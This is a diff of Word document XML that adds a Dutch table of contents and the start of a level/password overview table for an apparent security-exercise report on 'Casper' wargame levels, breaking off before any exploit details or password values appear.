--- a/verslag/verslag_dev_Sec.docx
+++ b/verslag/verslag_dev_Sec.docx
@@ -335,14 +335,1922 @@
         </w:p>
       </w:sdtContent>
     </w:sdt>
+    <w:sdt>
+      <w:sdtPr>
+        <w:rPr>
+          <w:lang w:val="nl-NL"/>
+        </w:rPr>
+        <w:id w:val="-397435431"/>
+        <w:docPartObj>
+          <w:docPartGallery w:val="Table of Contents"/>
+          <w:docPartUnique/>
+        </w:docPartObj>
+      </w:sdtPr>
+      <w:sdtEndPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:sdtEndPr>
+      <w:sdtContent>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Kopvaninhoudsopgave"/>
+          </w:pPr>
+          <w:r>
+            <w:rPr>
+              <w:lang w:val="nl-NL"/>
+            </w:rPr>
+            <w:t>Inhoud</w:t>
+          </w:r>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Inhopg1"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang/>
+            </w:rPr>
+          </w:pPr>
+          <w:r>
+            <w:fldChar w:fldCharType="begin"/>
+          </w:r>
+          <w:r>
+            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="separate"/>
+          </w:r>
+          <w:hyperlink w:anchor="_Toc25519919" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>Overzicht</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc25519919 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Inhopg1"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc25519920" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Casper4</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc25519920 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>3</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Inhopg3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc25519921" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>Omschrijving</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc25519921 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>3</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Inhopg3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc25519922" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>Vulnerability</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc25519922 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>3</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Inhopg3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc25519923" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>Exploit beschrijving</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc25519923 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>3</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Inhopg3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc25519924" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>Mitigation</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc25519924 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>3</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Inhopg2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc25519925" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>Advanced level: Casper41</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc25519925 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>3</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Inhopg1"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc25519926" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Casper</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>6</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc25519926 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>4</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Inhopg3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc25519927" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>Omschrijving</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc25519927 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>4</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Inhopg3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc25519928" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>Vulnerability</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc25519928 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>4</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Inhopg3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc25519929" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>Exploit beschrijving</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc25519929 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>4</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Inhopg3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc25519930" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>Mitigation</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc25519930 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>4</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Inhopg2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc25519931" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>Advanced level: Casper61</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc25519931 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>4</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:r>
+            <w:rPr>
+              <w:b/>
+              <w:bCs/>
+              <w:lang w:val="nl-NL"/>
+            </w:rPr>
+            <w:fldChar w:fldCharType="end"/>
+          </w:r>
+        </w:p>
+      </w:sdtContent>
+    </w:sdt>
     <w:p/>
     <w:p>
       <w:r>
         <w:br w:type="page"/>
       </w:r>
     </w:p>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop1"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="0" w:name="_Toc25519919"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Overzicht</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="0"/>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="Lijsttabel6kleurrijk-Accent1"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="2616"/>
+        <w:gridCol w:w="3888"/>
+        <w:gridCol w:w="2522"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>Level</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3005" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>Paswoord</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3006" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>Tijd</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>c</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>asper4</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3005" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
